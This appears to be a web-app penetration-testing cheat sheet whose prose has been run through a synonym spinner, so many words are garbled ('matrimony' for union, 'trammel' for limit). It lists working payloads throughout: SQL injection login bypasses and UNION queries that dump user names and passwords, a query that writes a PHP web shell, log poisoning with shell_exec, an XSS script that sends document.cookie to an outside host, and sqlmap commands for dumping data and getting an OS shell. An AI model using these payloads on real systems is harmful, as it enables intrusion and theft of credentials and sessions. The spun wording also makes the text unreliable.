General
Try reading the php source code of the spider web application:
http://<ip>/script.php/?-sDo you lot come across whatever LFI/RFI vulnerability posted past times Nikto? Try
fimap -u <ip-address>Check for Input Validation inward forms:
1′ or 1=1 trammel 1;# AND 1′ or 1=1--)
Stealing Cookies
<iframe src="http://10.11.0.5/report" pinnacle = "0" width = "0"></iframe>
<script> novel Image().src="http://10.11.0.5/bogus.php?output="+document.cookie; </script>
File Inclusion Vulnerabilities
php.ini values:
For LFI/RFI attacks, this powerfulness endure useful:
https://github.com/lightos/Panoptic/
register_globals allow_url allow_url_fopen allow_url_includeterminate our asking alongside a cipher byte () (possible inward php below 5.3)
For LFI/RFI attacks, this powerfulness endure useful:
https://github.com/lightos/Panoptic/
Contaminating Log Files
contaminate log file to movement them to incorporate PHP code to endure afterwards used inward LFI assail
nv -nv 192.168.30.35 lxxx <?php echo shell_exec($_GET['cmd']);?>thus, cmd= is introduced into the php execution in addition to straight off past times including the logfile you lot tin flame execute whatever ascendance
SQL Injection
Classic Authentication Bypass
select * from users where cite ='any' or 1=1;#'
select * from users where cite ='any' or 1=1 trammel 1;#'
Error Based Enum
gild past times
matrimony all operator → allows us to add together our ain choose queries to the master copy but the novel choose needs to bring the same discover of columns every bit the master copy columns contestation
matrimony all operator → allows us to add together our ain choose queries to the master copy but the novel choose needs to bring the same discover of columns every bit the master copy columns contestation
union all choose 1,2,3,4,5,6 matrimony all choose 1,2,3,4,@@version,6 matrimony all choose 1,2,3,4,user(),6
union all choose 1,2,3,4,table_name,6 FROM information_schema.tables
union all choose 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
union choose 1,2,name,4,password,6 FROM usersOR
http://10.11.1.35/comment.php?id=738 matrimony choose 1,2,3,4,concat(name,0x3a,password),6 FROM users
Blind SQL Injection
and 1=1;# in addition to 1=2;#if they bring dissimilar results in addition to so it is an indication of possible injection location
role fourth dimension every bit a exam parameter for enquiry
sleep(5)
select IF(MID(@@version,1,1) = '5', SLEEP(5), 0);
union all choose 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
http://10.11.1.35/comment.php?id=738 matrimony all choose 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
SQLMap
sqlmap -u http://192.168.30.35 --crawl=1
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --dump --threads=5
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --os-shell
Modify HTTP Headers
Install addon “Modify Headers”
In simply about cases, to await similar you lot bring a dissimilar IP, you lot tin flame alter the value of the X-Forwarded-For
https://docs.alertlogic.com/userGuides/web-security-manager-premier-preserve-IP-address.htm
In simply about cases, to await similar you lot bring a dissimilar IP, you lot tin flame alter the value of the X-Forwarded-For
https://docs.alertlogic.com/userGuides/web-security-manager-premier-preserve-IP-address.htm